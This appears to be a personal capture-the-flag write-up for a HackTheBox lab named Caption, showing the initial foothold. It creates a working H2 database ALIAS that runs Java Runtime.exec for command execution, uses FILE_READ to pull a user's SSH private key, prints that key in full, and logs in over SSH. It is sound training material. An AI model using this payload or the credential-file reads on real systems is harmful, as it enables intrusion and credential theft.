H2 Database

The target system is hosting a GitBucket instance on the target port 8080 and I was able to authenticate to it. It has been identified that the backend H2 database is running with a security context of a SA(System Administrator) user. This would mean that I can get code execution through the SQL query in the Database viewer section. Referring to an online resource

Create Alias

Create ALIAS SYS_EXEC AS $$ String sys_exec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new
    java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;

Create Alias function, SYS_EXEC, with Java Payload

Using the newly created Alias function, SYS_EXEC, to invoke a system-wide code execution The H2 instance is running as the margo user, who is a valid system user

SSH Key

The margo user has a SSH key; id_ecdsa

id_ecdsa

File Read

Using the built-in FILE_READ function, I can read the content of a file. such as a SSH private key

2122 characters

SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR) FROM DUAL; margo is a valid system user, and the user has a private SSH key

┌──(kali㉿kali)-[~/archive/htb/labs/caption]
└─$ echo 2d2d2d2d2d424547494e204f50454e5353482050524956415445204b45592d2d2d2d2d0a6233426c626e4e7a614331725a586b74646a45414141414142473576626d554141414145626d39755a5141414141414141414142414141416141414141424e6c5932527a5953317a614745790a4c573570633352774d6a55324141414143473570633352774d6a553241414141515152485a2f68523547307842577039387639656871646d796f305738794d75722f42396876565178324b540a39547149544979706d57505665766c63344b2f523232377733634646556d583846436e57523376434d614148414141416f4132494877304e6942384e414141414532566a5a484e684c584e6f0a59544974626d6c7a644841794e54594141414149626d6c7a644841794e545941414142424245646e2b46486b62544546616e33792f3136477032624b6a52627a4979367638483247395644480a597050314f6f684d6a4b6d5a593956362b567a677239486262764464775556535a6677554b645a48653849786f41634141414167413278536e6732634235444d31355146594b705a787546350a616c5a4363686531424d4a494f557541733059414141414141514944424155474277673d0a2d2d2d2d2d454e44204f50454e5353482050524956415445204b45592d2d2d2d2d0a | xxd -r -p
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRHZ/hR5G0xBWp98v9ehqdmyo0W8yMur/B9hvVQx2KT
9TqITIypmWPVevlc4K/R227w3cFFUmX8FCnWR3vCMaAHAAAAoA2IHw0NiB8NAAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEdn+FHkbTEFan3y/16Gp2bKjRbzIy6v8H2G9VDH
YpP1OohMjKmZY9V6+Vzgr9HbbvDdwUVSZfwUKdZHe8IxoAcAAAAgA2xSng2cB5DM15QFYKpZxuF5
alZCche1BMJIOUuAs0YAAAAAAQIDBAUGBwg=
-----END OPENSSH PRIVATE KEY-----
 
┌──(kali㉿kali)-[~/archive/htb/labs/caption]
└─$ chmod 600 ./id_ecdsa.margo

Exfiltrating & decoding the private SSH key of the margo user

┌──(kali㉿kali)-[~/archive/htb/labs/caption]
└─$ ssh margo@$IP -i ./id_ecdsa.margo
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-119-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Sun Sep 15 02:42:58 PM UTC 2024
 
  System load:  0.0               Processes:             233
  Usage of /:   69.1% of 8.76GB   Users logged in:       0
  Memory usage: 29%               IPv4 address for eth0: 10.129.226.125
  Swap usage:   0%
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
3 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
 
 
Last login: Tue Sep 10 12:33:42 2024 from 10.10.14.23
margo@caption:~$ whoami
margo
margo@caption:~$ hostname
caption
margo@caption:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:38:74 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.226.125/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3217sec preferred_lft 3217sec

Initial Foothold established to the target system as the margo user via SSH

InfoSec LAB

Explorer

Caption_Exploitation

H2 Database

Create Alias

SSH Key

File Read

Interactive Graph View

Table of Contents

Backlinks